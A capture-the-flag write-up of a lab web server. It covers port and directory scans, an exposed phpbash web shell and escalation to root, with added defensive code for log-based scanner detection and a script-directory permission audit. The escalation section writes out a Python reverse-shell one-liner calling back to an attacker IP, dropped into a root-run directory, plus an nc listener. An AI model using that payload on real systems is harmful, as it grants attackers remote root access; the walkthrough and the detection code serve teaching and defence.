Enumeration
Port Scan
$ nmap -sC -sV -oA nmap/initial 10.129.96.217
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 12:00 EST
Nmap scan report for 10.129.96.217
Host is up (0.079s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.21 seconds
Directory Enumeration (http - 80/tcp)
$ /go/bin/gobuster dir -u http://10.129.96.217 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.96.217
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/02/13 12:17:34 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 315] [--> http://10.129.96.217/images/]
/uploads (Status: 301) [Size: 316] [--> http://10.129.96.217/uploads/]
/php (Status: 301) [Size: 312] [--> http://10.129.96.217/php/]
/css (Status: 301) [Size: 312] [--> http://10.129.96.217/css/]
/dev (Status: 301) [Size: 312] [--> http://10.129.96.217/dev/]
/js (Status: 301) [Size: 311] [--> http://10.129.96.217/js/]
/fonts (Status: 301) [Size: 314] [--> http://10.129.96.217/fonts/]
/server-status (Status: 403) [Size: 301]
===============================================================
2021/02/13 12:46:37 Finished
===============================================================
Web Browser (http - 80/tcp)
- Web shell found at http://10.129.96.217/dev/phpbash.php
User Flag:
cat /home/arrexel/user.txt
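From the defender's side, the enumeration above leaves two distinct traces in the Apache access log: a burst of 404 responses to one client that announces itself with the gobuster User-Agent, and a successful request for a PHP file sitting under /dev/. The following added example (my own code, not part of the original writeup) parses Apache combined-format log lines and flags both patterns. The log lines, the 404 threshold and the list of directories in which a PHP file counts as suspicious are constructed for the demonstration; the attacker address and paths are taken from the writeup.

```python
"""Detect directory brute-forcing and web-shell hits in Apache access logs.

Added example for this writeup (not part of the original post). It parses
Apache "combined" log lines, flags clients that generate a burst of 404s or
identify themselves with a scanner User-Agent, and flags successful requests
for PHP files under directories that should not serve executable content.
All log lines produced by sample_log() are constructed sample data.
"""
import re
from collections import defaultdict

# Apache combined format: host ident authuser [date] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed policy: a PHP file served from these directories is a finding.
SUSPICIOUS_PHP_DIRS = ("/dev/", "/uploads/", "/images/")
SCANNER_UA_MARKERS = ("gobuster", "dirbuster", "ffuf", "nikto")
NOT_FOUND_THRESHOLD = 20  # 404s from one client before we call it brute-forcing


def parse_line(line):
    """Return the parsed fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyze(lines):
    """Return {'bruteforce': {ip: 404_count}, 'scanner_ua': {ip}, 'webshell': [(ip, path)]}."""
    not_found = defaultdict(int)
    scanner_ips = set()
    webshell_hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line; a real deployment would count these too
        if rec["status"] == 404:
            not_found[rec["ip"]] += 1
        if any(marker in rec["ua"].lower() for marker in SCANNER_UA_MARKERS):
            scanner_ips.add(rec["ip"])
        path = rec["path"].split("?", 1)[0].lower()
        if path.endswith(".php") and path.startswith(SUSPICIOUS_PHP_DIRS) and rec["status"] == 200:
            webshell_hits.append((rec["ip"], rec["path"]))
    bruteforce = {ip: n for ip, n in not_found.items() if n >= NOT_FOUND_THRESHOLD}
    return {"bruteforce": bruteforce, "scanner_ua": scanner_ips, "webshell": webshell_hits}


def sample_log():
    """Constructed sample lines (not real traffic): a gobuster run, then a hit on the web shell."""
    lines = []
    for i in range(25):
        lines.append(
            f'10.10.14.75 - - [13/Feb/2021:12:17:{i:02d} -0500] "GET /word{i} HTTP/1.1" 404 275 "-" "gobuster/3.1.0"'
        )
    lines.append('10.10.14.75 - - [13/Feb/2021:12:17:40 -0500] "GET /dev/ HTTP/1.1" 301 312 "-" "gobuster/3.1.0"')
    lines.append('10.10.14.75 - - [13/Feb/2021:12:50:01 -0500] "GET /dev/phpbash.php HTTP/1.1" 200 7312 "-" "Mozilla/5.0"')
    lines.append('192.0.2.10 - - [13/Feb/2021:12:51:00 -0500] "GET /index.html HTTP/1.1" 200 5301 "-" "Mozilla/5.0"')
    lines.append('192.0.2.10 - - [13/Feb/2021:12:51:02 -0500] "GET /css/style.css HTTP/1.1" 200 1200 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    report = analyze(sample_log())
    for ip, count in report["bruteforce"].items():
        print(f"brute-force: {ip} produced {count} 404s")
    for ip in sorted(report["scanner_ua"]):
        print(f"scanner user-agent: {ip}")
    for ip, path in report["webshell"]:
        print(f"PHP served from a non-code directory: {ip} -> {path}")
```

The User-Agent check is the weakest of the three signals, since it is trivially changed; the 404 burst and the PHP-in-upload-directory rule survive that and are the ones worth turning into an alert. The mitigation the last rule points at is configuration rather than detection: the web server should not execute PHP from /dev/, /uploads/ or /images/ at all.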
Exploitation
N/A
Privilege Escalation
- Upgrade web shell
- Create call back file
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.75",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >> /scripts/reverseshell.py
- Catch the reverse shell
nc -lvnp 8080
- Create call back file
Root Flag:
cat /root/root.txt
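The root cause of the privilege escalation above is that a web-server user can write into /scripts/ and the file it drops there is later run with root privileges (the writeup does not say what runs it; a scheduled job is my assumption). The following added example, my own code and not part of the original writeup, is the audit an administrator would run against such a directory: it reports every entry whose mode bits allow group or world writes, reports symlinks for manual review, and removes the offending write bits. It builds a throwaway directory that mimics the weak layout so it runs offline; the file names inside it are constructed.

```python
"""Audit a script directory for entries a low-privileged user could modify.

Added example for this writeup, not part of the original post. Assumption
(not stated on the page): files in the audited directory are executed by a
privileged scheduled job, so any group- or world-writable entry, or a
world-writable directory, lets an unprivileged user run code as root.
"""
import os
import stat
import tempfile

WRITE_BITS = stat.S_IWGRP | stat.S_IWOTH  # group- or world-writable


def audit_script_dir(directory):
    """Return a sorted list of (path, problem) for every weakly-permissioned entry under directory."""
    findings = []
    if os.stat(directory).st_mode & WRITE_BITS:
        findings.append((directory, "directory is group/world-writable: anyone can drop new scripts"))
    for root, dirs, files in os.walk(directory):
        for name in dirs + files:
            path = os.path.join(root, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                findings.append((path, "symlink in script directory: target may be attacker-controlled"))
                continue
            if mode & WRITE_BITS:
                findings.append((path, "group/world-writable"))
    return sorted(findings)


def harden(path):
    """Mitigation: strip group and world write bits. Symlinks are left for manual review."""
    mode = os.lstat(path).st_mode
    if stat.S_ISLNK(mode):
        return
    os.chmod(path, stat.S_IMODE(mode) & ~WRITE_BITS)


def build_demo_dir():
    """Construct a throwaway directory reproducing the weak layout: a world-writable script dir."""
    base = tempfile.mkdtemp(prefix="scripts-audit-")
    os.chmod(base, 0o777)  # world-writable, like the /scripts directory in the writeup
    safe = os.path.join(base, "backup.sh")  # constructed name, correctly permissioned
    with open(safe, "w") as f:
        f.write("#!/bin/sh\necho backup\n")
    os.chmod(safe, 0o755)
    weak = os.path.join(base, "cleanup.py")  # constructed name, world-writable
    with open(weak, "w") as f:
        f.write("print('cleanup')\n")
    os.chmod(weak, 0o666)
    return base


if __name__ == "__main__":
    demo = build_demo_dir()
    for path, problem in audit_script_dir(demo):
        print(f"{path}: {problem}")
        harden(path)
    print("after hardening:", audit_script_dir(demo))
```

Stripping the write bits closes the specific hole, but the durable fix is ownership: a directory whose contents run as root should be owned by root with mode 0755, and the job that runs them should refuse to execute anything not owned by root.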